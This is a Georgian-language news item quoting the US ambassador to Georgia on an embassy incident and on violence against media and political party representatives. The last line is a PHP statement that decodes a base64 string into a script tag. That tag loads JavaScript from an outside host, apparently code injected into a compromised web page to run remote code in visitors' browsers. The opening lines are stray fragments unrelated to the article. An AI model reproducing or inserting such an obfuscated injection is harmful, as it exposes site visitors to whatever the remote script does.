celsiusi
ავერსი შნაიდერი
ცოტა იმედგაცრუებული დავრჩით, რომ გუშინდელმა ინციდენტმა გადაფარა ამერიკის დამოუკიდებლობის დღისადმი მიძღვნილი ღონისძიება, რაც იყო მართლაც არაჩვეულებრივი, ძალიან პოზიტიური, – ამის შესახებ საქართველოში აშშ-ის ელჩმა კელი დეგნანმა განაცხადა.
 
კელი დეგნანს კითხვა დაუსვეს გუშინ ამერიკის საელჩოში მომხდარ ინციდენტთან დაკავშირებით. ელჩმა აღნიშნა:
 
„ჩვენ ვსწავლობთ ამ ცნობებს, ამ ინფორმაციას. არ ვიცით, თუ დაიწყო რაიმე კონკრეტული სამართლებრივი პროცესი ამ საკითხთან დაკავშირებით, თუმცა ვიტყვით, რომ ძალადობა არის მიუღებელი და განსაკუთრებით მაშინ, როდესაც ბოლო პერიოდში ვხედავთ რაღაც გარკვეულ ასეთ შემთხვევებს მედიის წინააღმდეგ. ასევე გვესმის და შეშფოთებული ვართ ცნობებით იმის შესახებ, რომ ძალადობას აქვს ადგილი რეგიონებში სხვადასხვა პოლიტიკური პარტიის წარმომადგენლების მიმართ. ძალიან შემაშფოთებელია, როდესაც ძალადობით ხდება ხელის შეშლა ადამიანის უფლებების, რაც გულისხმობს შეკრების თავისუფლებას, სიტყვის თავისუფლებას და ასე შემდეგ. გუშინ მართლაც არაჩვეულებრივი ღონისძიება გვქონდა, ძალიან პოზიტიური, სადაც შეიკრიბა ბევრი ქართველი. ჩვენ გვინდოდა, კიდევ ერთხელ წარმოგვეჩინა და ხაზი გაგვესვა, რომ მნიშვნელოვანია, როდესაც ქართველები ერთიანდებიან, ერთიანდებია  ევროატლანტიკური მისწრაფებებისთვის. ცოტა იმედგაცრუებული დავრჩით, რომ ამ ინციდენტმა გადაფარა ჩვენი ღონისძიება, ამერიკის დამოუკიდებლობის დღე, რაც იყო მართლაც არაჩვეულებრივი, ძალიან პოზიტიური“.
816
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");